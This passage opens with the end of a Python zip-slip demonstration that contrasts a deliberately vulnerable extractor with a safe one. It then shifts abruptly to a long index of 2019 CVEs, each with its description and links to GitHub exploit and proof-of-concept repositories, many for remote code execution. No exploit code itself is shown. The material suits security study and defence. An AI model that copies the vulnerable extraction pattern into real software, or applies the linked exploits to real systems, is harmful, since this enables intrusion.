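                raise ValueError(f"zip member escapes destination: {info.filename!r}")
            targets.append((info, target))
        written = []
        for info, target in targets:
            if info.is_dir():
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(target)
    return written


def run_demo() -> dict:
    """Run both extractors against the sample inside a fresh temp tree."""
    root = os.path.realpath(tempfile.mkdtemp(prefix="zipslip_demo_"))
    data = build_malicious_package()
    vuln_dest = os.path.join(root, "downloads", "pkg")
    os.makedirs(vuln_dest)
    vulnerable_extract(data, vuln_dest)
    safe_dest = os.path.join(root, "safe")
    os.makedirs(safe_dest)
    try:
        safe_extract(data, safe_dest)
        rejected = False
    except ValueError:
        rejected = True
    return {
        "vulnerable_escaped": os.path.isfile(os.path.join(root, "escaped.txt")),
        "safe_rejected": rejected,
        "safe_wrote": os.listdir(safe_dest) != [],
        "root": root,
    }


if __name__ == "__main__":
    print(run_demo())
```

The check uses `realpath()` on both sides so symlinked temp directories compare correctly, and validates the whole member list before writing anything; a per-member check that writes as it goes would still leave the benign members of a hostile archive on disk.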

### CVE-2019-14830 (2021-03-19)

A vulnerability was found in Moodle 3.7 to 3.7.1, 3.6 to 3.6.5, 3.5 to 3.5.7 and earlier unsupported versions, where the mobile launch endpoint contained an open redirect in some circumstances, which could result in a user's mobile access token being exposed. (Note: This does not affect sites with a forced URL scheme configured, mobile service disabled, or where the mobile app login method is "via the app").

- [Fr3d-/moodle-token-stealer](https://github.com/Fr3d-/moodle-token-stealer)

### CVE-2019-14900 (2020-07-06)

A flaw was found in Hibernate ORM in versions before 5.3.18, 5.4.18 and 5.5.0.Beta1. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.

- [shanika04/hibernate-orm](https://github.com/shanika04/hibernate-orm)

### CVE-2019-14912 (2019-09-20)

An issue was discovered in PRiSE adAS 1.7.0. The OPENSSO module does not properly check the goto parameter, leading to an open redirect that leaks the session cookie.

- [Wocanilo/adaPwn](https://github.com/Wocanilo/adaPwn)

### CVE-2019-14974 (2019-08-14)

SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS.

- [conan-sudo/CVE-2019-14974-bypass](https://github.com/conan-sudo/CVE-2019-14974-bypass)

### CVE-2019-15029 (2019-09-05)

FusionPBX 4.4.8 allows an attacker to execute arbitrary system commands by submitting a malicious command to the service_edit.php file (which will insert the malicious command into the database). To trigger the command, one needs to call the services.php file via a GET request with the service id followed by the parameter a=start to execute the stored command.

- [mhaskar/CVE-2019-15029](https://github.com/mhaskar/CVE-2019-15029)

### CVE-2019-15043 (2019-09-03)

In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.

- [h0ffayyy/CVE-2019-15043](https://github.com/h0ffayyy/CVE-2019-15043)

### CVE-2019-15053 (2019-08-14)

The "HTML Include and replace macro" plugin before 1.5.0 for Confluence Server allows a bypass of the includeScripts=false XSS protection mechanism via vectors involving an IFRAME element.

- [l0nax/CVE-2019-15053](https://github.com/l0nax/CVE-2019-15053)

### CVE-2019-15107 (2019-08-16)

An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.

- [jas502n/CVE-2019-15107](https://github.com/jas502n/CVE-2019-15107)
- [HACHp1/webmin_docker_and_exp](https://github.com/HACHp1/webmin_docker_and_exp)
- [ketlerd/CVE-2019-15107](https://github.com/ketlerd/CVE-2019-15107)
- [AdministratorGithub/CVE-2019-15107](https://github.com/AdministratorGithub/CVE-2019-15107)
- [Rayferrufino/Make-and-Break](https://github.com/Rayferrufino/Make-and-Break)
- [AleWong/WebminRCE-EXP-CVE-2019-15107-](https://github.com/AleWong/WebminRCE-EXP-CVE-2019-15107-)
- [ianxtianxt/CVE-2019-15107](https://github.com/ianxtianxt/CVE-2019-15107)
- [hannob/webminex](https://github.com/hannob/webminex)
- [ChakoMoonFish/webmin_CVE-2019-15107](https://github.com/ChakoMoonFish/webmin_CVE-2019-15107)
- [cdedmondson/Modified-CVE-2019-15107](https://github.com/cdedmondson/Modified-CVE-2019-15107)
- [ruthvikvegunta/CVE-2019-15107](https://github.com/ruthvikvegunta/CVE-2019-15107)
- [n0obit4/Webmin_1.890-POC](https://github.com/n0obit4/Webmin_1.890-POC)
- [squid22/Webmin_CVE-2019-15107](https://github.com/squid22/Webmin_CVE-2019-15107)
- [MuirlandOracle/CVE-2019-15107](https://github.com/MuirlandOracle/CVE-2019-15107)
- [diegojuan/CVE-2019-15107](https://github.com/diegojuan/CVE-2019-15107)
- [whokilleddb/CVE-2019-15107](https://github.com/whokilleddb/CVE-2019-15107)
- [darrenmartyn/CVE-2019-15107](https://github.com/darrenmartyn/CVE-2019-15107)
- [hacknotes/CVE-2019-15107-Exploit](https://github.com/hacknotes/CVE-2019-15107-Exploit)
- [CyberTuz/CVE-2019-15107_detection](https://github.com/CyberTuz/CVE-2019-15107_detection)
- [hadrian3689/webmin_1.920](https://github.com/hadrian3689/webmin_1.920)
- [f0rkr/CVE-2019-15107](https://github.com/f0rkr/CVE-2019-15107)
- [psw01/CVE-2019-15107_webminRCE](https://github.com/psw01/CVE-2019-15107_webminRCE)
- [lolminerxmrig/CVE-2019-15107](https://github.com/lolminerxmrig/CVE-2019-15107)
- [TheAlpha19/MiniExploit](https://github.com/TheAlpha19/MiniExploit)
- [wenruoya/CVE-2019-15107](https://github.com/wenruoya/CVE-2019-15107)
- [g1vi/CVE-2019-15107](https://github.com/g1vi/CVE-2019-15107)
- [K3ysTr0K3R/CVE-2019-15107-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2019-15107-EXPLOIT)
- [gozn/detect-CVE-2019-15107-by-pyshark](https://github.com/gozn/detect-CVE-2019-15107-by-pyshark)
- [h4ck0rman/CVE-2019-15107](https://github.com/h4ck0rman/CVE-2019-15107)
- [olingo99/CVE-2019-15107](https://github.com/olingo99/CVE-2019-15107)
- [aamfrk/Webmin-CVE-2019-15107](https://github.com/aamfrk/Webmin-CVE-2019-15107)
- [0x4r2/Webmin-CVE-2019-15107](https://github.com/0x4r2/Webmin-CVE-2019-15107)
- [NasrallahBaadi/CVE-2019-15107](https://github.com/NasrallahBaadi/CVE-2019-15107)
- [grayorwhite/CVE-2019-15107](https://github.com/grayorwhite/CVE-2019-15107)

### CVE-2019-15120 (2019-08-16)

The Kunena extension before 5.1.14 for Joomla! allows XSS via BBCode.

- [h3llraiser/CVE-2019-15120](https://github.com/h3llraiser/CVE-2019-15120)

### CVE-2019-15126 (2020-02-05)

An issue was discovered on Broadcom Wi-Fi client devices. Specifically timed and handcrafted traffic can cause internal errors (related to state transitions) in a WLAN device that lead to improper layer 2 Wi-Fi encryption with a consequent possibility of information disclosure over the air for a discrete set of traffic, a different vulnerability than CVE-2019-9500, CVE-2019-9501, CVE-2019-9502, and CVE-2019-9503.

- [0x13enny/kr00k](https://github.com/0x13enny/kr00k)
- [hexway/r00kie-kr00kie](https://github.com/hexway/r00kie-kr00kie)
- [akabe1/kr00ker](https://github.com/akabe1/kr00ker)

### CVE-2019-15166 (2019-10-03)

lmp_print_data_link_subobjs() in print-lmp.c in tcpdump before 4.9.3 lacks certain bounds checks.

- [Satheesh575555/external_tcpdump_AOSP10_r33_CVE-2019-15166](https://github.com/Satheesh575555/external_tcpdump_AOSP10_r33_CVE-2019-15166)

### CVE-2019-15224 (2019-08-19)

The rest-client gem 1.6.10 through 1.6.13 for Ruby, as distributed on RubyGems.org, included a code-execution backdoor inserted by a third party. Versions <=1.6.9 and >=1.6.14 are unaffected.

- [chef-cft/inspec_cve_2019_15224](https://github.com/chef-cft/inspec_cve_2019_15224)

### CVE-2019-15231
- [wizardy0ga/THM-Source-CVE-2019-15231](https://github.com/wizardy0ga/THM-Source-CVE-2019-15231)

### CVE-2019-15233 (2019-08-20)

The Live:Text Box macro in the Old Street Live Input Macros app before 2.11 for Confluence has XSS, leading to theft of the Administrator Session Cookie.

- [l0nax/CVE-2019-15233](https://github.com/l0nax/CVE-2019-15233)

### CVE-2019-15477 (2019-08-23)

Jooby before 1.6.4 has XSS via the default error handler.

- [epicosy/jooby](https://github.com/epicosy/jooby)

### CVE-2019-15511 (2019-11-21)

An exploitable local privilege escalation vulnerability exists in the GalaxyClientService installed by GOG Galaxy. Due to Improper Access Control, an attacker can send unauthenticated local TCP packets to the service to gain SYSTEM privileges in Windows system where GOG Galaxy software is installed. All GOG Galaxy versions before 1.2.60 and all corresponding versions of GOG Galaxy 2.0 Beta are affected.

- [adenkiewicz/CVE-2019-15511](https://github.com/adenkiewicz/CVE-2019-15511)

### CVE-2019-15514 (2019-08-23)

The Privacy > Phone Number feature in the Telegram app 5.10 for Android and iOS provides an incorrect indication that the access level is Nobody, because attackers can find these numbers via the Group Info feature, e.g., by adding a significant fraction of a region's assigned phone numbers.

- [bibi1959/CVE-2019-15514](https://github.com/bibi1959/CVE-2019-15514)

### CVE-2019-15588 (2019-11-01)

There is an OS Command Injection in Nexus Repository Manager <= 2.14.14 (bypass of CVE-2019-5475) that could allow an attacker Remote Code Execution (RCE). All instances using CommandLineExecutor.java with user-supplied data are vulnerable, such as the Yum Configuration Capability.

- [EXP-Docs/CVE-2019-15588](https://github.com/EXP-Docs/CVE-2019-15588)

### CVE-2019-15605 (2020-02-07)

HTTP request smuggling in Node.js 10, 12, and 13 causes malicious payload delivery when transfer-encoding is malformed.

- [jlcarruda/node-poc-http-smuggling](https://github.com/jlcarruda/node-poc-http-smuggling)

### CVE-2019-15642 (2019-08-26)

rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."

- [jas502n/CVE-2019-15642](https://github.com/jas502n/CVE-2019-15642)

### CVE-2019-15813 (2019-09-04)

Multiple file upload restriction bypass vulnerabilities in Sentrifugo 3.2 could allow authenticated users to execute arbitrary code via a webshell.

- [wolf1892/CVE-2019-15813](https://github.com/wolf1892/CVE-2019-15813)

### CVE-2019-15846 (2019-09-06)

Exim before 4.92.2 allows remote attackers to execute arbitrary code as root via a trailing backslash.

- [synacktiv/Exim-CVE-2019-15846](https://github.com/synacktiv/Exim-CVE-2019-15846)

### CVE-2019-15858 (2019-09-03)

admin/includes/class.import.snippet.php in the "Woody ad snippets" plugin before 2.2.5 for WordPress allows unauthenticated options import, as demonstrated by storing an XSS payload for remote code execution.

- [GeneralEG/CVE-2019-15858](https://github.com/GeneralEG/CVE-2019-15858)
- [orangmuda/CVE-2019-15858](https://github.com/orangmuda/CVE-2019-15858)

### CVE-2019-15896 (2019-09-10)

An issue was discovered in the LifterLMS plugin through 3.34.5 for WordPress. The upload_import function in the class.llms.admin.import.php script is prone to an unauthenticated options import vulnerability that could lead to privilege escalation (administrator account creation), website redirection, and stored XSS.

- [RandomRobbieBF/CVE-2019-15896](https://github.com/RandomRobbieBF/CVE-2019-15896)

### CVE-2019-15972 (2019-11-26)

A vulnerability in the web-based management interface of Cisco Unified Communications Manager could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. The vulnerability exists because the web-based management interface improperly validates SQL values. An attacker could exploit this vulnerability by authenticating to the application and sending malicious requests to an affected system. A successful exploit could allow the attacker to modify values on or return values from the underlying database.

- [FSecureLABS/Cisco-UCM-SQLi-Scripts](https://github.com/FSecureLABS/Cisco-UCM-SQLi-Scripts)

### CVE-2019-16097 (2019-09-08)

core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is set up with DB as the authentication backend and allows users to self-register. Fixed versions: v1.7.6, v1.8.3, v1.9.0. Workaround without applying the fix: configure Harbor to use a non-DB authentication backend such as LDAP.

- [evilAdan0s/CVE-2019-16097](https://github.com/evilAdan0s/CVE-2019-16097)
- [rockmelodies/CVE-2019-16097-batch](https://github.com/rockmelodies/CVE-2019-16097-batch)
- [ianxtianxt/CVE-2019-16097](https://github.com/ianxtianxt/CVE-2019-16097)
- [dacade/cve-2019-16097](https://github.com/dacade/cve-2019-16097)
- [theLSA/harbor-give-me-admin](https://github.com/theLSA/harbor-give-me-admin)
- [luckybool1020/CVE-2019-16097](https://github.com/luckybool1020/CVE-2019-16097)

### CVE-2019-16098 (2019-09-11)

The driver in Micro-Star MSI Afterburner 4.6.2.15658 (aka RTCore64.sys and RTCore32.sys) allows any authenticated user to read and write to arbitrary memory, I/O ports, and MSRs. This can be exploited for privilege escalation, code execution under high privileges, and information disclosure. These signed drivers can also be used to bypass the Microsoft driver-signing policy to deploy malicious code.

- [Barakat/CVE-2019-16098](https://github.com/Barakat/CVE-2019-16098)
- [0xDivyanshu-new/CVE-2019-16098](https://github.com/0xDivyanshu-new/CVE-2019-16098)
- [Offensive-Panda/NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE](https://github.com/Offensive-Panda/NT-AUTHORITY-SYSTEM-CONTEXT-RTCORE)

### CVE-2019-16113 (2019-09-08)

Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.

- [ynots0ups/CVE-2019-16113](https://github.com/ynots0ups/CVE-2019-16113)
- [cybervaca/CVE-2019-16113](https://github.com/cybervaca/CVE-2019-16113)
- [hg8/CVE-2019-16113-PoC](https://github.com/hg8/CVE-2019-16113-PoC)
- [Kenun99/CVE-2019-16113-Dockerfile](https://github.com/Kenun99/CVE-2019-16113-Dockerfile)
- [dldygnl/CVE-2019-16113](https://github.com/dldygnl/CVE-2019-16113)
- [0xConstant/CVE-2019-16113](https://github.com/0xConstant/CVE-2019-16113)
- [DXY0411/CVE-2019-16113](https://github.com/DXY0411/CVE-2019-16113)
- [0xConstant/CVE-2019-16113_](https://github.com/0xConstant/CVE-2019-16113_)
- [mind2hex/CVE-2019-16113](https://github.com/mind2hex/CVE-2019-16113)
- [tronghoang89/cve-2019-16113](https://github.com/tronghoang89/cve-2019-16113)

### CVE-2019-16172 (2019-09-09)

LimeSurvey before v3.17.14 allows stored XSS for escalating privileges from a low-privileged account to, for example, SuperAdmin. The attack uses a survey group in which the title contains JavaScript that is mishandled upon group deletion.

- [TrixSec/CVE-2019-16172](https://github.com/TrixSec/CVE-2019-16172)

### CVE-2019-16253 (2019-09-25)

The Text-to-speech Engine (aka SamsungTTS) application before 3.0.02.7 and 3.0.00.101 for Android allows a local attacker to escalate privileges, e.g., to system privileges. The Samsung case ID is 101755.

- [k0mraid3/K0mraid3s-System-Shell-PREBUILT](https://github.com/k0mraid3/K0mraid3s-System-Shell-PREBUILT)

### CVE-2019-16278 (2019-10-14)

Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.

- [jas502n/CVE-2019-16278](https://github.com/jas502n/CVE-2019-16278)
- [imjdl/CVE-2019-16278-PoC](https://github.com/imjdl/CVE-2019-16278-PoC)
- [ianxtianxt/CVE-2019-16278](https://github.com/ianxtianxt/CVE-2019-16278)
- [darkerego/Nostromo_Python3](https://github.com/darkerego/Nostromo_Python3)
- [AnubisSec/CVE-2019-16278](https://github.com/AnubisSec/CVE-2019-16278)
- [aN0mad/CVE-2019-16278-Nostromo_1.9.6-RCE](https://github.com/aN0mad/CVE-2019-16278-Nostromo_1.9.6-RCE)
- [Kr0ff/cve-2019-16278](https://github.com/Kr0ff/cve-2019-16278)
- [NHPT/CVE-2019-16278](https://github.com/NHPT/CVE-2019-16278)
- [keshiba/cve-2019-16278](https://github.com/keshiba/cve-2019-16278)
- [h3xcr4ck3r/CVE-2019-16278](https://github.com/h3xcr4ck3r/CVE-2019-16278)
- [alexander-fernandes/CVE-2019-16278](https://github.com/alexander-fernandes/CVE-2019-16278)
- [FredBrave/CVE-2019-16278-Nostromo-1.9.6-RCE](https://github.com/FredBrave/CVE-2019-16278-Nostromo-1.9.6-RCE)
- [0xTabun/CVE-2019-16278](https://github.com/0xTabun/CVE-2019-16278)

### CVE-2019-16279 (2019-10-14)

A memory error in the function SSL_accept in nostromo nhttpd through 1.9.6 allows an attacker to trigger a denial of service via a crafted HTTP request.

- [ianxtianxt/CVE-2019-16279](https://github.com/ianxtianxt/CVE-2019-16279)

### CVE-2019-16374 (2020-08-13)

Pega Platform 8.2.1 allows LDAP injection because a username can contain a * character and can be of unlimited length. An attacker can specify four characters of a username, followed by the * character, to bypass access control.

- [IAG0110/CVE-2019-16374](https://github.com/IAG0110/CVE-2019-16374)

### CVE-2019-16394 (2019-09-17)

SPIP before 3.1.11 and 3.2 before 3.2.5 provides different error messages from the password-reminder page depending on whether an e-mail address exists, which might help attackers to enumerate subscribers.

- [trungnd51/Silent_CVE_2019_16394](https://github.com/trungnd51/Silent_CVE_2019_16394)

### CVE-2019-16405 (2019-11-21)

Centreon Web before 2.8.30, 18.10.x before 18.10.8, 19.04.x before 19.04.5 and 19.10.x before 19.10.2 allows Remote Code Execution by an administrator who can modify Macro Expression location settings. CVE-2019-16405 and CVE-2019-17501 are similar to one another and may be the same.

- [TheCyberGeek/CVE-2019-16405.rb](https://github.com/TheCyberGeek/CVE-2019-16405.rb)

### CVE-2019-16516 (2020-01-23)

An issue was discovered in ConnectWise Control (formerly known as ScreenConnect) 19.3.25270.7185. There is a user enumeration vulnerability, allowing an unauthenticated attacker to determine with certainty if an account exists for a given username.

- [czz/ScreenConnect-UserEnum](https://github.com/czz/ScreenConnect-UserEnum)

### CVE-2019-16662 (2019-10-28)

An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.

- [mhaskar/CVE-2019-16662](https://github.com/mhaskar/CVE-2019-16662)

### CVE-2019-16663 (2019-10-28)

An issue was discovered in rConfig 3.9.2. An attacker can directly execute system commands by sending a GET request to search.crud.php because the catCommand parameter is passed to the exec function without filtering, which can lead to command execution.

- [mhaskar/CVE-2019-16663](https://github.com/mhaskar/CVE-2019-16663)

### CVE-2019-16692 (2019-09-22)

phpIPAM 1.4 allows SQL injection via the app/admin/custom-fields/filter-result.php table parameter when action=add is used.

- [kkirsche/CVE-2019-16692](https://github.com/kkirsche/CVE-2019-16692)

### CVE-2019-16724 (2019-09-24)

File Sharing Wizard 1.5.0 allows a remote attacker to obtain arbitrary code execution by exploiting a Structured Exception Handler (SEH) based buffer overflow in an HTTP POST parameter, a similar issue to CVE-2010-2330 and CVE-2010-2331.

- [nanabingies/CVE-2019-16724](https://github.com/nanabingies/CVE-2019-16724)

### CVE-2019-16746 (2019-09-24)

An issue was discovered in net/wireless/nl80211.c in the Linux kernel through 5.2.17. It does not check the length of variable elements in a beacon head, leading to a buffer overflow.

- [uthrasri/CVE-2019-16746](https://github.com/uthrasri/CVE-2019-16746)

### CVE-2019-16759 (2019-09-24)

vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.

- [M0sterHxck/CVE-2019-16759-Vbulletin-rce-exploit](https://github.com/M0sterHxck/CVE-2019-16759-Vbulletin-rce-exploit)
- [r00tpgp/http-vuln-CVE-2019-16759](https://github.com/r00tpgp/http-vuln-CVE-2019-16759)
- [jas502n/CVE-2019-16759](https://github.com/jas502n/CVE-2019-16759)
- [theLSA/vbulletin5-rce](https://github.com/theLSA/vbulletin5-rce)
- [FarjaalAhmad/CVE-2019-16759](https://github.com/FarjaalAhmad/CVE-2019-16759)
- [andripwn/pwn-vbulletin](https://github.com/andripwn/pwn-vbulletin)
- [psychoxploit/vbull](https://github.com/psychoxploit/vbull)
- [polar1s7/CVE-2019-16759-bypass](https://github.com/polar1s7/CVE-2019-16759-bypass)
- [nako48/CVE-2019-16759](https://github.com/nako48/CVE-2019-16759)
- [0xdims/CVE-2019-16759](https://github.com/0xdims/CVE-2019-16759)
- [sunian19/CVE-2019-16759](https://github.com/sunian19/CVE-2019-16759)
- [ludy-dev/vBulletin_Routestring-RCE](https://github.com/ludy-dev/vBulletin_Routestring-RCE)
- [fxp0-4tx/CVE-2019-16759](https://github.com/fxp0-4tx/CVE-2019-16759)

### CVE-2019-16784 (2020-01-14)

In PyInstaller before version 3.6, only on Windows, a local privilege escalation vulnerability is present in this particular case: a program built with PyInstaller in "onefile" mode is launched by a privileged user (at least more privileged than the current one) whose "TempPath" resolves to a world-writable directory. This is the case, for example, if the program is launched as a service or as a scheduled task using a system account (TempPath will be C:\Windows\Temp). In order to be exploitable, the program has to be (re)started after the attacker launches the exploit program, so for a service launched at startup, a service restart is needed (e.g. after a crash or an upgrade).

- [AlterSolutions/PyInstallerPrivEsc](https://github.com/AlterSolutions/PyInstallerPrivEsc)
- [Ckrielle/CVE-2019-16784-POC](https://github.com/Ckrielle/CVE-2019-16784-POC)

### CVE-2019-16889 (2019-09-25)

Ubiquiti EdgeMAX devices before 2.0.3 allow remote attackers to cause a denial of service (disk consumption) because *.cache files in /var/run/beaker/container_file/ are created when providing a valid length payload of 249 characters or fewer to the beaker.session.id cookie in a GET header. The attacker can use a long series of unique session IDs.

- [grampae/CVE-2019-16889-poc](https://github.com/grampae/CVE-2019-16889-poc)

### CVE-2019-16920 (2019-09-27)

Unauthenticated remote code execution occurs in D-Link products such as DIR-655C, DIR-866L, DIR-652, and DHP-1565. The issue occurs when the attacker sends an arbitrary input to a "PingTest" device common gateway interface that could lead to command injection. An attacker who successfully triggers the command injection could achieve full system compromise. Later, it was independently found that these are also affected: DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835, and DIR-825.

- [eniac888/CVE-2019-16920-MassPwn3r](https://github.com/eniac888/CVE-2019-16920-MassPwn3r)

### CVE-2019-16941 (2019-09-28)

NSA Ghidra through 9.0.4, when experimental mode is enabled, allows arbitrary code execution if the Read XML Files feature of Bit Patterns Explorer is used with a modified XML document. This occurs in Features/BytePatterns/src/main/java/ghidra/bitpatterns/info/FileBitPatternInfoReader.java. An attack could start with an XML document that was originally created by DumpFunctionPatternInfoScript but then directly modified by an attacker (for example, to make a java.lang.Runtime.exec call).

- [purpleracc00n/CVE-2019-16941](https://github.com/purpleracc00n/CVE-2019-16941)

### CVE-2019-17026 (2020-03-02)

Incorrect alias information in IonMonkey JIT compiler for setting array elements could lead to a type confusion. We are aware of targeted attacks in the wild abusing this flaw. This vulnerability affects Firefox ESR < 68.4.1, Thunderbird < 68.4.1, and Firefox < 72.0.1.

- [maxpl0it/CVE-2019-17026-Exploit](https://github.com/maxpl0it/CVE-2019-17026-Exploit)
- [lsw29475/CVE-2019-17026](https://github.com/lsw29475/CVE-2019-17026)

### CVE-2019-17041 (2019-10-07)

An issue was discovered in Rsyslog v8.1908.0. contrib/pmaixforwardedfrom/pmaixforwardedfrom.c has a heap overflow in the parser for AIX log messages. The parser tries to locate a log message delimiter (in this case, a space or a colon) but fails to account for strings that do not satisfy this constraint. If the string does not match, then the variable lenMsg will reach the value zero and will skip the sanity check that detects invalid log messages. The message will then be considered valid, and the parser will eat up the nonexistent colon delimiter. In doing so, it will decrement lenMsg, a signed integer, whose value was zero and now becomes minus one. The following step in the parser is to shift left the contents of the message. To do this, it will call memmove with the right pointers to the target and destination strings, but the lenMsg will now be interpreted as a huge value, causing a heap overflow.

- [Resery/CVE-2019-17041](https://github.com/Resery/CVE-2019-17041)

### CVE-2019-17080 (2019-10-02)

mintinstall (aka Software Manager) 7.9.9 for Linux Mint allows code execution if a REVIEWS_CACHE file is controlled by an attacker, because an unpickle occurs. This is resolved in 8.0.0 and backports.

- [Andhrimnirr/Mintinstall-object-injection](https://github.com/Andhrimnirr/Mintinstall-object-injection)
- [materaj2/Mintinstall-object-injection](https://github.com/materaj2/Mintinstall-object-injection)

### CVE-2019-17124 (2019-10-09)

Kramer VIAware 2.5.0719.1034 has Incorrect Access Control.

- [hessandrew/CVE-2019-17124](https://github.com/hessandrew/CVE-2019-17124)

### CVE-2019-17137 (2020-02-10)

This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR AC1200 R6220 Firmware version 1.1.0.86 Smart WiFi Router. Authentication is not required to exploit this vulnerability. The specific flaw exists within the processing of path strings. By inserting a null byte into the path, the user can skip most authentication checks. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-8616.

- [vncloudsco/CVE-2019-17137](https://github.com/vncloudsco/CVE-2019-17137)

### CVE-2019-17147 (2020-01-07)

This vulnerability allows remote attackers to execute arbitrary code on affected installations of TP-LINK TL-WR841N routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web service, which listens on TCP port 80 by default. When parsing the Host request header, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length static buffer. An attacker can leverage this vulnerability to execute code in the context of the admin user. Was ZDI-CAN-8457.

- [DrmnSamoLiu/CVE-2019-17147_Practice_Material](https://github.com/DrmnSamoLiu/CVE-2019-17147_Practice_Material)

### CVE-2019-17195 (2019-10-15)

Connect2id Nimbus JOSE+JWT before v7.9 can throw various uncaught exceptions while parsing a JWT, which could result in an application crash (potential information disclosure) or a potential authentication bypass.

- [somatrasss/weblogic2021](https://github.com/somatrasss/weblogic2021)

### CVE-2019-17221 (2019-11-05)

PhantomJS through 2.1.1 has an arbitrary file read vulnerability, as demonstrated by an XMLHttpRequest for a file:// URI. The vulnerability exists in the page.open() function of the webpage module, which loads a specified URL and calls a given callback. An attacker can supply a specially crafted HTML file, as user input, that allows reading arbitrary files on the filesystem. For example, if page.render() is the function callback, this generates a PDF or an image of the targeted file. NOTE: this product is no longer developed.

- [h4ckologic/CVE-2019-17221](https://github.com/h4ckologic/CVE-2019-17221)

### CVE-2019-17225 (2019-10-06)

Subrion 4.2.1 allows XSS via the panel/members/ Username, Full Name, or Email field, aka an "Admin Member JSON Update" issue.

- [hacker625/CVE-2019-17225](https://github.com/hacker625/CVE-2019-17225)

### CVE-2019-17234 (2019-11-12)

includes/class-coming-soon-creator.php in the igniteup plugin through 3.4 for WordPress allows unauthenticated arbitrary file deletion.

- [administra1tor/CVE-2019-17234b-Exploit](https://github.com/administra1tor/CVE-2019-17234b-Exploit)

### CVE-2019-17240 (2019-10-06)

bl-kernel/security.class.php in Bludit 3.9.2 allows attackers to bypass a brute-force protection mechanism by using many different forged X-Forwarded-For or Client-IP HTTP headers.

- [pingport80/CVE-2019-17240](https://github.com/pingport80/CVE-2019-17240)
- [LucaReggiannini/Bludit-3-9-2-bb](https://github.com/LucaReggiannini/Bludit-3-9-2-bb)
- [triple-octopus/Bludit-CVE-2019-17240-Fork](https://github.com/triple-octopus/Bludit-CVE-2019-17240-Fork)
- [ColdFusionX/CVE-2019-17240_Bludit-BF-Bypass](https://github.com/ColdFusionX/CVE-2019-17240_Bludit-BF-Bypass)
- [jayngng/bludit-CVE-2019-17240](https://github.com/jayngng/bludit-CVE-2019-17240)
- [brunosergi/bloodit](https://github.com/brunosergi/bloodit)
- [spyx/cve-2019-17240](https://github.com/spyx/cve-2019-17240)
- [mind2hex/CVE-2019-17240](https://github.com/mind2hex/CVE-2019-17240)

### CVE-2019-17382 (2019-10-09)

An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.

- [K3ysTr0K3R/CVE-2019-17382-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2019-17382-EXPLOIT)

### CVE-2019-17424 (2019-10-22)

A stack-based buffer overflow in the processPrivilage() function in IOS/process-general.c in nipper-ng 0.11.10 allows remote attackers (serving firewall configuration files) to achieve Remote Code Execution or Denial Of Service via a crafted file.

- [mavlevin/CVE-2019-17424](https://github.com/mavlevin/CVE-2019-17424)

### CVE-2019-17427 (2019-10-10)

In Redmine before 3.4.11 and 4.0.x before 4.0.4, persistent XSS exists due to textile formatting errors.

- [RealLinkers/CVE-2019-17427](https://github.com/RealLinkers/CVE-2019-17427)

### CVE-2019-17495 (2019-10-10)

A Cascading Style Sheets (CSS) injection vulnerability in Swagger UI before 3.23.11 allows attackers to use the Relative Path Overwrite (RPO) technique to perform CSS-based input field value exfiltration, such as exfiltration of a CSRF token value. In other words, this product intentionally allows the embedding of untrusted JSON data from remote servers, but it was not previously known that <style>@import within the JSON data was a functional attack method.

- [SecT0uch/CVE-2019-17495-test](https://github.com/SecT0uch/CVE-2019-17495-test)

### CVE-2019-17497 (2019-10-10)

Tracker PDF-XChange Editor before 8.0.330.0 has an NTLM SSO hash theft vulnerability using crafted FDF or XFDF files (a related issue to CVE-2018-4993). For example, an NTLM hash is sent for a link to \\192.168.0.2\C$\file.pdf without user interaction.

- [JM-Lemmi/cve-2019-17497](https://github.com/JM-Lemmi/cve-2019-17497)

### CVE-2019-17498 (2019-10-21)

In libssh2 v1.9.0 and earlier versions, the SSH_MSG_DISCONNECT logic in packet.c has an integer overflow in a bounds check, enabling an attacker to specify an arbitrary (out-of-bounds) offset for a subsequent memory read. A crafted SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server.

- [Timon-L/3007Project](https://github.com/Timon-L/3007Project)

### CVE-2019-17513 (2019-10-18)

An issue was discovered in Ratpack before 1.7.5. Due to a misuse of the Netty library class DefaultHttpHeaders, there is no validation that headers lack HTTP control characters. Thus, if untrusted data is used to construct HTTP headers with Ratpack, HTTP Response Splitting can occur.

- [epicosy/Ratpack-1](https://github.com/epicosy/Ratpack-1)

### CVE-2019-17525 (2020-04-21)

